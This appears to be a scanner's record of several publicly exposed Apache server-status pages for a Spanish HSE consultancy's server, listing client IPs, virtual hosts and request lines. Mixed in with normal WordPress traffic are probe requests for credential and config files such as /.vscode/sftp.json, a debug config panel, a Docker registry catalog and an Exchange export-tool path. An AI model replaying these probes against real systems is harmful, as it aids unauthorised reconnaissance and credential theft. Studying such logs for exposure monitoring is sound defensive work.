95.2804955085600.014.08473.48 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/820/20334R 95.326668378253510.015.61414.23 172.70.127.35h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/846/20235_ 95.401232749050.014.04498.34 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-216541420/1090/20479_ 95.37050113912790.023.74480.65 34.250.24.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01 1-216541420/896/19931_ 95.35167346437400.020.98475.43 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/869/20630_ 95.271586639891630.022.29529.41 34.67.136.168http/1.1 2-216541430/753/9295_ 87.130025009570.013.85189.46 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-216541430/577/9146_ 86.464028348350.010.22220.35 165.22.5.96http/1.1 2-216541430/626/9983_ 86.892222921044030.09.63180.59 46.222.130.26h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216541430/529/10095_ 86.68864052055230.08.04205.18 203.162.123.52http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/613/9863_ 86.9603235464630.012.85237.75 138.68.133.118http/1.1 2-216541430/611/9155_ 87.089130104680680.013.29196.53 172.64.236.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/607/9206_ 87.03210035779170.012.09183.32 66.249.66.145http/1.1barrerasdecontencion.com:443GET /wp-content/uploads/2017/05/tubewall_9.jpg HTTP/1.1 2-216541430/678/9177_ 87.002055924052580.012.26187.80 66.249.66.145http/1.1 2-216541430/491/8974_ 87.034129486400.08.78193.94 103.23.61.80http/1.1lcftech.es:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216541430/746/9716_ 87.02863032801460.013.78201.09 141.101.69.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/551/16105_ 88.620074543990.08.99404.61 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216541410/743/16145_ 89.730046292560.014.54412.79 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-216541410/712/16486_ 89.1626717846047050.011.31445.53 179.43.191.18http/1.1lcftech.es:443GET / HTTP/1.1 3-216541410/460/17173_ 89.65210026219730.028.14432.32 66.249.66.45http/1.1lcftech.es:80GET /ads.txt HTTP/1.1 3-216541410/459/15351_ 89.622676147535120.07.13390.05 95.217.145.143http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 3-216541410/691/15468W 88.350073454630.015.87368.51 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-216541410/671/15687_ 88.230036755990.014.15377.35 138.68.133.118http/1.1 3-216541410/602/15621_ 88.350234663820.044.51439.72 138.68.133.118http/1.1 3-216541410/621/16141_ 89.47206027927840.08.14410.08 66.249.66.45http/1.1 3-216541410/557/17134_ 89.520032872290.010.53351.34 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-217452020/240/29660_ 17.8628017357544990.05.99701.59 82.180.139.94http/1.1lcftech.es:443POST /xmlrpc.php HTTP/1.1 4-217452020/242/31140_ 18.360067465310.07.28684.05 138.68.133.118http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-217452020/316/29583_ 18.170055746670.05.77725.21 138.68.133.118http/1.1 4-217452020/271/30326_ 18.08269154170850.04.24828.37 34.221.97.111h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-217452020/275/29662_ 18.262805470292210.03.07692.57 103.28.36.200http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 4-217452020/262/29671_ 17.17280059789610.07.02800.29 168.119.68.250h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-217452020/275/30975_ 18.19268074474360.05.73750.49 54.36.148.115h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-217452020/305/30862_ 18.12268086977870.04.84776.08 168.119.68.250h2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8b15f4359
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 19-Sep-2023 06:08:31 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 11 days 18 hours 18 minutes 28 seconds Server load: 0.02 0.08 0.06 Total accesses: 642809 - Total Traffic: 14.7 GB - Total Duration: 85686391 CPU Usage: u226.64 s210.12 cu1865.42 cs1371.52 - .361% CPU load .632 requests/sec - 15.2 kB/second - 24.0 kB/request - 133.3 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0437745no0yes010000 1513539no0yes010000 2437746no0yes010000 3437747no1yes010000 4531555no0yes19000 Sum501 149000 _________________________________________________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-204377450/550/5498_ 88.32789346369820.07.58110.66 66.249.70.162http/1.1 0-204377450/564/5162_ 88.96981246712060.08.20123.51 167.172.232.142http/1.1pre.relehse.com:443GET /_all_dbs HTTP/1.1 0-204377450/588/5559_ 89.134775317559280.07.56129.47 54.36.148.43h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204377450/514/5469_ 88.2247706562740.08.68105.96 8.48.3.114h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-204377450/542/5332_ 88.264771357846490.018.99113.20 188.78.194.51http/1.1lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-204377450/433/4948_ 89.0279407562900.012.69112.67 66.249.70.162http/1.1tandemsl.com:443GET /wp-content/uploads/2019/06/logo-tandem-hse-menu.png HTTP/1 0-204377450/543/5240_ 87.0345008029250.010.49108.23 134.0.10.229http/1.1 0-204377450/645/5310_ 89.1545027710260.013.9685.16 134.0.10.229http/1.1barrerasdecontencion.com:443GET /wp-cron.php HTTP/1.1 0-204377450/502/5539_ 87.0598108540410.016.90137.02 200.124.14.202h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-204377450/499/5103_ 87.0416906967930.09.3186.02 198.235.24.213http/1.1 1-205135390/1598/17165_ 66.600021981340.066.94452.70 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-205135390/1544/17263_ 66.46389023139050.040.41383.10 177.228.142.212h2tandemsl.com:443idle, streams: 0/45/45/0/0 (open/recv/resp/push/rst) 1-205135390/1771/17560_ 66.33381023918360.045.34408.26 189.180.57.177h2tandemsl.com:443done, streams: 0/55/55/0/0 (open/recv/resp/push/rst) 1-205135390/1681/17361_ 66.463899323259180.036.33388.23 177.228.142.212h2tandemsl.com:443idle, streams: 0/44/44/0/0 (open/recv/resp/push/rst) 1-205135390/1595/17182_ 66.46388020448890.022.68422.09 177.228.142.212h2tandemsl.com:443idle, streams: 0/48/48/0/0 (open/recv/resp/push/rst) 1-205135390/1566/18029_ 66.334020057260.024.50363.60 134.122.34.144http/1.1 1-205135390/1606/18128_ 66.38381021797070.051.76455.36 189.180.57.177h2tandemsl.com:443done, streams: 0/49/49/0/0 (open/recv/resp/push/rst) 1-205135390/1765/17726_ 66.43390419975760.039.80422.00 177.228.142.212h2tandemsl.com:443idle, streams: 0/19/19/0/0 (open/recv/resp/push/rst) 1-205135390/1672/17521_ 66.33381023119700.027.73418.22 189.180.57.177h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 1-205135390/1710/18293_ 66.46386024556740.036.03477.26 177.228.142.212h2tandemsl.com:443idle, streams: 0/49/49/0/0 (open/recv/resp/push/rst) 2-204377460/847/5943_ 91.1438708758760.013.26108.93 66.249.70.164http/1.1 2-204377460/761/6014_ 91.1597607978780.024.82156.89 187.137.50.83h2tandemsl.com:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 2-204377460/859/6282_ 91.42856389086570.015.47110.74 148.244.210.170h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/956/6556_ 91.723731812416680.019.15139.88 167.172.232.142http/1.1pre.relehse.com:443GET /images/.DS_Store HTTP/1.1 2-204377460/660/6098_ 91.923913588842000.012.22146.35 66.249.70.164http/1.1tandemsl.com:443GET /seguridad-industrial-blog/transporte-de-mercancias-peligro 2-204377460/813/5972_ 91.1843409587070.012.82115.30 189.180.57.177h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/843/5970_ 91.18796316318990.010.90121.98 187.137.50.83h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/731/5872_ 91.155010989960.09.30100.42 134.122.34.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/826/5827_ 91.1837408900910.015.21131.08 195.154.122.14h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-204377460/972/6194_ 91.7243615455160.011.64126.03 134.122.34.144http/1.1 3-204377470/572/12640_ 85.89568017313180.011.99337.54 134.122.34.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-204377470/741/12678_ 85.920016088810.032.65333.15 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-204377470/572/13468_ 85.921022187380.09.16362.91 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-204377470/550/13819_ 85.8962816865770.012.82334.50 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1695096498.51595091819763183593 3-204377470/590/12477_ 85.91347016897940.012.77330.68 177.228.142.212h2tandemsl.com:443done, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 3-204377470/656/12759_ 85.8602819227850.027.16302.17 66.249.76.8http/1.1tandemsl.com:443GET /wp-content/uploads/2023/09/Nuevas-clases-de-peligro-2023.p 3-204377470/566/12705_ 85.91235123608810.012.84295.62 177.228.142.212h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-204377470/533/12535_ 85.926019559910.05.74312.54 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-204377470/593/12899_ 85.91234815996810.018.17333.29 177.228.142.212h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 3-204377470/622/14026_ 85.78552716439160.016.86287.84 134.122.34.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/701/22118_ 30.722026573560.016.87516.68 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-205315550/710/23231_ 30.653028310540.012.11476.72 134.122.34.144h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/612/21823_ 30.653026735650.012.24555.95 134.122.34.144http/1.1 4-205315550/691/22277_ 30.653025833940.09.09576.02 134.122.34.144http/1.1 4-205315550/574/21965_ 30.50229427270060.07.87505.62 114.119.135.224http/1.1tandemsl.com:443GET /en/hse-engineering/apq-storage-of-chemical-products/consul 4-205315550/857/21956_ 30.3112126852330.010.31587.15 167.172.232.142http/1.1pre.relehse.com:443GET / HTTP/1.1 4-205315550/593/22470_ 30.722025766710.09.86527.82 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc808b31cdb
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 17-Sep-2023 01:01:36 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 9 days 13 hours 11 minutes 32 seconds Server load: 0.00 0.02 0.04 Total accesses: 541180 - Total Traffic: 12.4 GB - Total Duration: 73301878 CPU Usage: u303.48 s250.76 cu1418.86 cs1053.8 - .367% CPU load .656 requests/sec - 15.8 kB/second - 24.1 kB/request - 135.448 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0277443no0yes010000 1388014no0yes19000 2277444no0yes010000 3323894no0yes010000 4385445no0yes010000 Sum500 149000 _________________W________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-192774430/678/4942_ 116.29117225909060.014.47102.76 65.109.146.34http/1.1tandemsl.com:443GET /wp-content/uploads/2023/06/innovacion.png HTTP/1.1 0-192774430/664/4588_ 116.26109116239090.022.14114.73 197.210.84.83http/1.1 0-192774430/777/4951_ 116.9111793066909200.026.68121.58 134.209.42.3h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-192774430/739/4940_ 115.95117212176054620.019.6397.22 35.190.204.246http/1.1tandemsl.com:443GET / HTTP/1.1 0-192774430/771/4783_ 116.30125627246160.016.4894.03 65.109.155.253http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-192774430/564/4508_ 116.29117427215570.014.5399.96 65.109.146.34http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-192774430/631/4691_ 116.104503017526820.014.8797.66 83.32.134.21h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-192774430/700/4651_ 116.30127242860.011.5270.86 68.183.64.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-192774430/665/5033_ 116.9510925178133380.017.07120.01 197.210.84.83http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/restricciones-del-uso-de-la-eto 0-192774430/669/4589_ 115.47121416454760.011.0376.24 142.132.250.173h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/1285/13194_ 61.5613016328960.041.63327.08 68.183.64.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/1524/13094_ 61.6425124017607370.042.41280.66 5.42.65.39http/1.1lcftech.es:443GET / HTTP/1.0 1-193880140/1384/13030_ 61.631216855210.034.18306.75 68.183.64.176http/1.1 1-193880140/1405/13376_ 61.660017615350.044.16295.93 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-193880140/1564/13141_ 61.4125014725600.059.08337.41 38.41.4.110h2tandemsl.com:443idle, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 1-193880140/1462/14016_ 61.641214284470.043.36291.18 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-193880140/1471/14008_ 61.53141415609100.085.80359.00 68.183.64.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/1478/13508W 61.600014467300.035.41335.92 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-193880140/1445/13293_ 61.61123917628690.036.02332.99 40.77.167.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-193880140/1552/13872_ 61.451018704900.052.10373.09 68.183.64.176h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/973/5093_ 127.64110607751560.015.7795.65 177.236.112.86h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-192774440/1005/5249_ 127.48110607149590.034.61131.85 79.117.82.195h2lcftech.es:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-192774440/850/5419_ 126.8511361167999330.014.3095.06 77.111.246.31h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/961/5596_ 126.641135311567300.019.39120.66 65.109.158.41http/1.1tandemsl.com:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 2-192774440/991/5432_ 127.6111353787959350.021.85133.72 142.132.250.173h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-192774440/955/5153_ 126.9614348600450.023.62102.35 68.183.64.176http/1.1 2-192774440/1062/5123_ 127.67113596515135910.021.97111.02 103.23.61.80http/1.1tandemsl.com:443GET / HTTP/1.1 2-192774440/989/5135_ 126.8511136069920990.022.0391.08 65.109.155.159http/1.1tandemsl.com:443GET /requisitos-legales-blog/european-accreditation/ HTTP/1.1 2-192774440/853/4995_ 127.67111108095730.019.13115.78 77.111.246.31h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-192774440/968/5218_ 127.671111014381520.032.37114.25 77.111.246.31h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-193238940/2782/12029_ 130.645933916649850.089.46324.41 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694904702.96022200584411621093 3-193238940/2404/11919_ 130.09282215252120.0108.77299.72 66.249.66.39http/1.1lcftech.es:443GET /wp-content/uploads/elementor/css/global.css?ver=1667403582 3-193238940/2832/12883_ 129.9327829521541130.093.32353.23 42.193.241.216http/1.1 3-193238940/2730/13252_ 130.0027840316212500.065.52321.41 42.193.241.216http/1.1tandemsl.com:443GET /static/lib/webuploader/0.1.5/server/preview.php HTTP/1.1 3-193238940/2540/11870_ 130.772823016295020.070.83317.55 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694905013.43995404243469238281 3-193238940/2454/12088_ 130.77278418637800.057.00274.85 42.193.241.216http/1.1tandemsl.com:443GET /static/lib/webuploader/0.1.5/server/preview.php HTTP/1.1 3-193238940/2611/12123_ 130.09593023012370.076.36282.28 66.249.66.39http/1.1lcftech.es:443GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/r 3-193238940/2680/11981_ 130.880019027660.077.38306.42 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-193238940/2882/12278_ 130.09593315522900.083.26314.37 66.249.66.39http/1.1lcftech.es:443GET /wp-content/themes/astra/assets/css/minified/main.min.css?v 3-193238940/2621/13390_ 130.4103515924290.049.13270.89 68.183.64.176http/1.1 4-193854450/1208/17975_ 57.72033421465090.036.16405.94 38.41.4.110h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-193854450/1268/19082_ 57.511023718140.045.15354.31 68.183.64.176http/1.1 4-193854450/1083/17784_ 57.97023921916350.025.85460.52 52.167.144.181h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-193854450/1146/18158_ 58.000121756860.024.14476.87 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-193854450/1208/18370_ 58.000023072460.077.72425.84 68.183.64.176http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-193854450/1275/17938_ 57.96142122945620.025.44504.74 68.183.64.176http/1.1 4-193854450/1019/18829_ 57.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8d70078bc
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 14-Sep-2023 00:04:55 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 19 Parent Server MPM Generation: 18 Server uptime: 6 days 12 hours 14 minutes 51 seconds Server load: 0.04 0.04 0.00 Total accesses: 377503 - Total Traffic: 8.1 GB - Total Duration: 50956321 CPU Usage: u143.74 s217.42 cu1020.36 cs691.03 - .368% CPU load .671 requests/sec - 15.2 kB/second - 22.6 kB/request - 134.983 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0247391no0yes010000 1247553no0yes19000 2247392no0yes010000 3247584no0yes010000 4247393no0yes010000 Sum500 149000 _________________W________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-182473910/260/4005_ 35.2612014379690.07.1282.88 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js 0-182473910/354/3655_ 35.2712024957300.016.1890.08 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/js/preloaded-modules.m 0-182473910/193/3887_ 35.26005415420.08.4992.54 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/261/3879_ 35.26104680310.04.1374.32 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-182473910/208/3790_ 35.2611905985330.07.1375.99 163.116.231.118http/1.1 0-182473910/332/3675_ 35.2612005848560.04.2683.29 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min. 0-182473910/284/3746_ 35.2612006289890.08.6877.75 163.116.231.118http/1.1tandemsl.com:443GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 HTTP/1.1 0-182473910/305/3685_ 35.271193175594030.05.7457.11 163.116.231.118http/1.1tandemsl.com:443GET /wp-json/contact-form-7/v1/contact-forms/2215/feedback/sche 0-182473910/331/4110_ 35.2611906782530.011.31100.94 163.116.231.118http/1.1 0-182473910/200/3637_ 35.2712005048460.07.0462.71 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery. 1-182475530/1412/8752_ 70.31123210524520.033.13210.63 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/themes/metro-pro/style.css?ver=2.1.1 HTTP/1.1 1-182475530/1228/8880_ 70.00121012628550.030.67189.56 66.249.89.12http/1.1 1-182475530/1230/8634_ 70.1912224311732790.026.05197.46 163.116.231.118http/1.1 1-182475530/996/8823_ 70.01134011999920.039.76178.31 66.249.89.128http/1.1 1-182475530/1196/8487_ 70.28009556780.049.25199.93 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-182475530/1312/9324_ 70.261225539281560.029.14169.54 163.116.231.118http/1.1 1-182475530/1310/9181_ 70.360010080830.033.32187.12 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-182475530/1142/9034W 70.01009408320.024.39216.42 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-182475530/1417/8873_ 70.30126012232560.039.73200.39 66.249.89.12http/1.1lcftech.es:80GET /google7c4c9bd3d45b02fc.html HTTP/1.1 1-182475530/1302/9467_ 70.31122013579240.039.85218.92 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/sitepress-multilingual-cms/templates/la 2-182473920/825/4035_ 79.23025723850.017.2279.22 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-182473920/853/4170_ 79.2211905243920.024.3396.30 163.116.231.118http/1.1 2-182473920/861/4515_ 79.2411916204510.015.2580.32 163.116.231.118http/1.1tandemsl.com:443GET /wp-includes/js/wp-emoji-release.min.js?ver=6.3.1 HTTP/1.1 2-182473920/781/4581_ 79.2312009856430.021.34100.41 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/uploads/2019/11/TandemHSE-telefono.png HTTP/1.1 2-182473920/862/4388_ 79.2312006231780.019.84110.97 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/share-link/share-l 2-182473920/820/4143_ 79.2312006849770.023.0478.23 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/uploads/2019/11/TandemHSE-ubicacion.png HTTP/1. 2-182473920/733/3991_ 79.230013396800.023.2188.59 178.62.73.12http/1.1 2-182473920/869/4068_ 79.23018248750.013.0567.20 178.62.73.12http/1.1 2-182473920/892/4095_ 79.2211906301240.016.4195.80 163.116.231.118http/1.1 2-182473920/897/4147_ 79.23120612731040.020.3380.84 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor-pro/assets/js/preloaded-eleme 3-182475840/1128/6420_ 69.15008107430.026.37161.05 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-182475840/1315/6487_ 69.15007054770.021.95112.09 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-182475840/1457/6784_ 69.150013562280.036.75181.17 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-182475840/1401/7302_ 69.110167886800.022.88161.02 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694642650.22566294670104980468 3-182475840/1335/6540_ 69.14008633540.035.11189.55 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-182475840/1188/6801_ 68.970010998450.022.52151.25 163.116.231.118http/1.1 3-182475840/1251/6100_ 69.0601214957600.015.89135.59 178.62.73.12http/1.1 3-182475840/1174/6308_ 69.08009987380.028.42151.90 66.249.70.162http/1.1 3-182475840/1297/6535_ 68.98007814450.033.70134.13 178.62.73.12http/1.1 3-182475840/1599/6971_ 69.14018215230.032.10145.87 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-182473930/1194/13752_ 66.66119015950900.022.24309.28 163.116.231.118http/1.1 4-182473930/1071/14694_ 66.67120617429930.012.93257.72 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min. 4-182473930/1059/13862_ 66.66121116196250.028.45359.92 163.116.231.118http/1.1tandemsl.com:443GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 H 4-182473930/1036/14377_ 66.67120216290490.036.01374.38 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver 4-182473930/1032/14270_ 66.660017721780.035.77289.43 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-182473930/1105/13729_ 66.66121017265890.039.97382.27 163.116.231.118http/1.1tandemsl.com:443GET /wp-content/plugins/contact-form-7/modules/recaptcha/index. 4-182473930/1190/14849_ 66.66119115162380.017.97337.83 163.116.231.118http/1.1 4-182473930/1005/14319_ 66.66120<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8657c7e19
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 13-Sep-2023 04:43:47 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 5 days 16 hours 53 minutes 44 seconds Server load: 0.05 0.05 0.01 Total accesses: 313832 - Total Traffic: 6.8 GB - Total Duration: 34706865 CPU Usage: u78.33 s66.99 cu909.98 cs617.88 - .34% CPU load .637 requests/sec - 14.4 kB/second - 22.6 kB/request - 110.591 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0221954no0yes19000 1221957no0yes010000 2221955no0yes010000 3221956no0yes010000 4222086no0yes010000 Sum500 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-172219540/885/2916_ 33.08102869390.014.1459.38 161.35.155.246h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172219540/928/2833_ 33.16164903541870.017.0560.43 5.161.188.118http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/revision-de-las-fichas-de-datos 0-172219540/801/3065_ 33.15003945360.012.7174.50 161.35.155.246http/1.1 0-172219540/892/3039W 33.10003305720.013.2164.13 